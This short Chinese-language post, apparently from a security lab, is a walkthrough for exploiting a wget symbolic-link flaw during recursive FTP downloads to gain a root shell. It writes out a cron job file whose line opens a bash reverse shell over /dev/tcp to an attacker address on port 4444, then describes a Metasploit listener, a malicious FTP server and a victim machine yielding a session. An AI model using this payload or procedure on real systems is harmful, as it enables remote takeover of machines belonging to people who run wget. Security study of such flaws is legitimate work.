28日,linux操作系统的wget被发现安全漏洞,当用户通过wget命令递归下载文件时,攻击者可通过构造恶意的符号链接文件触发该漏洞,从而在wget用户的系统中创建任意文件、目录或符号链接并设置访问权限。 攻防实验室的小伙伴们在当天就对漏洞进行了分析验证。不久后国外的安全研究者已经能通过此漏洞反弹交互式的shell,利用的是linux的计划任务。Metasploit也更新了相应的模块,下面我们一起来看看怎么利用wget漏洞获得交互式的shell吧。 首先我们先建立一个计划任务文件,文件内容是反弹一个交互式的shell到本机。 - cat>cronshell <<EOD
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- * * * * * root bash -c '<&112-;exec 112<>/dev/tcp/ 192.168.220.128/4444;sh <&112 >&112 2>&112'
- EOD
复制代码
然后,我们利用msf监听本地端口。 搭建一个攻击ftp 下面我用一台centos递归下载ftp上的内容。 可以看到,我们已经获得了session。 |